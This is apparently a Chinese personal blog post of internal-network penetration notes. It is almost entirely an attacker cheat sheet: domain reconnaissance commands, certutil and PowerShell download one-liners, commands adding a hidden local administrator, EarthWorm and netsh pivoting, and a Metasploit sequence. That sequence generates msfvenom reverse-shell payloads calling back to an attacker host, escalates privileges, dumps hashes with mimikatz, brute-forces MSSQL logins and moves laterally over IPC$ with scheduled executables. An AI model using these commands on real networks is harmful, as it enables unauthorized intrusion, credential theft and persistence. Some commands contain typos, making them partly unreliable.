内网渗透小记

常用一句话webshell

https://github.com/tennc/webshell

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

dnscmd <servername> /ZonePrint <zonename> 查看dns列表(DC执行)
tasklist /SVC 查看系统进程及其描述
query user || qwinsta 查看当前在线用户
net user 查看本机用户
net user /domain 查看域用户
net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多
net view /domain 查看有几个域
net view \\\\dc 查看 dc 域内共享文件
net group /domain 查看域里面的组
net group "domain admins" /domain 查看域管
net localgroup administrators /domain /这个也是查域管,是升级为域控时,本地账户也成为域管
net group "domain controllers" /domain 域控
net time /domain
net config workstation 当前登录域 - 计算机名 - 用户名
net use \\\\域控(如pc.xx.com) password /user:xxx.com\username 相当于这个帐号登录域内主机,可访问资源
ipconfig
systeminfo
tasklist /svc 详细进程信息
tasklist /S ip /U domain\username /P /V 查看远程计算机 tasklist
taskkill /im imagename /f 结束进程
net localgroup administrators && whoami 查看当前是不是属于管理组
netstat -ano
nltest /dclist:xx 查看域控
nltest /domain_trusts 查看域信任信息
whoami /all 查看 Mandatory Label uac 级别和 sid 号
net sessoin 查看远程连接 session (需要管理权限)
net share 共享目录
cmdkey /l 查看保存登陆凭证
echo %logonserver% 查看登陆域
spn –l administrator spn 记录
set 环境变量
dsquery server - 查找目录中的 AD DC/LDS 实例
dsquery user - 查找目录中的用户
dsquery computer 查询所有计算机名称 windows 2003
dir /s *.exe 查找指定目录下及子目录下没隐藏文件
arp -a
tracert 查路由

windows 下载文件

  • bitsadmin

    1
    2
    download文件
    bitsadmin /transfer n https://www.baidu.com/robots.txt c:\1.txt
  • powershell

    1
    2
    3
    4
    5
    一条命令download文件
    powershell (new-object System.Net.WebClient).DownloadFile('https://www.baidu.com/robots.txt','C:\1.txt')
    多条命令download文件
    $client = new-object System.Net.WebClient
    $client.DownloadFile('https://www.baidu.com/robots.txt', 'C:\1.txt')
  • certutil.exe

    1
    cmd.exe /c certutil.exe -urlcache -split -f https://www.baidu.com/robots.txt

添加删除用户操作

  • 1
    2
    net user admin1 P@ssw0rd /add & net localgroup administrators admin1 /add    添加用户并设置管理员
    net user admin1 /del

内网代理工具

EW

tools:
http://rootkiter.com/EarthWorm
正向:
被攻击机(跳板):

./ew_for_Linux -s ssocksd -l 9999 (侦听 0.0.0.0:9999)
netstat -pantu|grep 9999 (查看是否侦听成功)

攻击机:

proxychain 设置 socks5 为跳板 ip port
proxychain nmap 即可以用跳板代理扫描其他主机

netsh Windows 自带工具 windows 端口转发

1
2
3
netsh interface portproxy add v4tov4  listenaddress=0.0.0.0 listenport=53 connectaddress=10.10.10.4  connectport=8880
netsh interface portproxy show v4tov4
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=53

MSF反弹 shell

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

1.生成一个回连木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.111 LPORT=443 -f dll>/root/Desktop/443.dll

2.生成木马后,我们在菜刀里放入生成的木马,运行,同时打开msf准备回连

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.111
set lport 443
run

4.提权

background 或 ctrl+z

use exploit/windows/local/ms11_080_afdjoinleaf
set session 1
run
hashdump //密码获取
load mimikatz //使用mimikatz
kerberos //查看解密

5.新加路由查看子网

route
background
sessions
route add 192.168.2.0 255.255.255.0 2
search mssql //找mssql模块
use auxiliary/scanner/mssql/mssql_login //使用login模块

show options

set rhosts 192.168.177.1/24

set password sa@123
run
show options
set BEUTEFORCE_SPEED 0
run

端口扫描search portscan

use auxiliary/scanner/portscan/tcp //使用scanner模块
show options
set RHOSTS 192.168.2.0/24
set ports 139,445,3389 //设置扫描端口

ipc$

D:>net use \192.168.1.254\c$ “pwd” /user:user //连接192.168.1.254的IPC$共享,用unc路径
D:>copy srv.exe \192.168.1.254\c$ //复制本地 srv.exe 到C根目录
D:>net time \192.168.1.254 //查时间
D:>at \192.168.1.254 10:50 srv.exe //用at命令在10点50分启动 srv.exe
D:>net use \192.168.1.254\c$ /del

士不可以不弘毅,任重而道远。仁以为己任,不亦重乎?死而后已,不亦远乎?

本文标题:内网渗透小记

文章作者:yaron

发布时间:2019年02月26日 - 22:33:16

最后更新:2019年08月09日 - 01:33:08

原文链接:https://yaalonsong.github.io/2019/02/26/内网渗透小记.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。